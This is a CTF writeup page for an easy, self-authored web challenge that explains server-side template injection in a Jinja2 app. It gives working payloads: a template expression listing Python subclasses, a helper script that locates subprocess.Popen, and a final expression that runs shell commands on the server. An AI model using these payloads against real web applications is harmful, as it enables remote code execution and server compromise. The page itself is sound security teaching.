Kabinet's GitBook
  • 🚩Kabinet CTF's Writeups
  • Page
  • 2025
    • Thuderdome
      • Emerge through the breach
      • Pulled from the sky
      • An absent defense
      • A new wave (web of deceit)
      • Crossing the great divide
      • Joining forces as one
      • Infiltrate (open the gate)
      • Jaeger
      • Victory
  • 2024
    • GreyCTF 2024
      • Markdown Parser
      • Fearless Concurrency
      • GreyCTF Survey
      • Baby Web
      • Beautiful Styles
      • All About Timing
      • Poly Playground
    • TetCTF 2024
      • Hello from API GW
      • Microservices
  • 2023
    • BSidesSF Cloud Village CTF
      • Tony Tony Tony
      • Plain Sight
      • A Suit of Armor Around The World
      • Sharing is Caring + Sequel
      • Photo Drive
    • DART CTF
      • Flag 1
      • Flag 2
      • Flag 3
      • Flag 4
      • Flag 5
      • Flag 6
      • Flag 7
      • Flag 8
      • Flag 9
      • Flag 10
    • EKS Cluster Games
    • Big IAM Challenge
  • 2022
    • Stack The Flag
      • Secret of Meow Olympurr
  • Authored
    • Cyber League 2025 Major 1
      • Perfect Storage
      • catalog commits
      • pawtainer hub
    • Lag and Crash 2023
      • Managed Secrets
      • Pickle Rick
      • Cloudy with a chance of meatball
    • NYP InfoSec December CTF 2022
      • Super Secure Technology Infrastructure
      • Self Introduction
      • Aww Cuter Cat
      • Obligatory Calc
      • BreadSecurity
  • NYP InfoSec Introduction to Pentesting Workshop
Powered by GitBook
On this page
  • Description
  • References

Was this helpful?

  1. Authored
  2. NYP InfoSec December CTF 2022

Super Secure Technology Infrastructure

PreviousNYP InfoSec December CTF 2022NextSelf Introduction

Last updated 1 year ago

Was this helpful?

Difficulty
Points
Solves

Easy

146

9

Description

Super secure technology infrastructure, A fortress built with digital flair, Encrypted and protected, no intrusion allowed, Our data safe from any dare. Poem by ChatGPT

By the challenge title, we can identify that it is a Server Side Template Injection vulnerability.

Server-side template injection (SSTI) is a type of vulnerability that occurs when a web application dynamically generates templates using user input, and then sends those templates to the server to be rendered. If the user input is not properly sanitized, an attacker can inject malicious code into the template, which will be executed on the server when the template is rendered.

First, we will need to identify the templating engine used, and we can refer to this chart below.

After playing with the input, we can identify that it is running Jinja2. We can also refer the the hacktricks guide to identify the templating engine.

Referring to the Jinja2 SSTI guide, we are able to perform remote code execution and get the flag!

First, we will need to identify the <class 'subprocess.Popen'> offset. We can find it using the payload below to list all the subclasses

{{''.__class__.__mro__[1].__subclasses__()}}

Very handy script to find the offset 

data = """[<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, <class 'weakproxy'>, <class 'int'>, <class 'bytearray'>, <class 'bytes'>, <class 'list'>, <class 'NoneType'>, <class 'NotImplemented>..."""
data = data.split(', ')

id = []
for i,d in enumerate(data):
    if 'subprocess' in d:
        print("Found in index:",i)
        id.append(i)

for i in id:
        print(f"{{{{ ''.__class__.__mro__[1].__subclasses__()[{i}]('ls',shell=True,stdout=-1).communicate() }}}}")

After finding <class 'subprocess.Popen'> we can then utilize it to perform RCE.

{{''.__class__.__mro__[1].__subclasses__()[397]('cat flag.txt',shell=True,stdout=-1).communicate()}}

References

https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server Side Template Injection#jinja2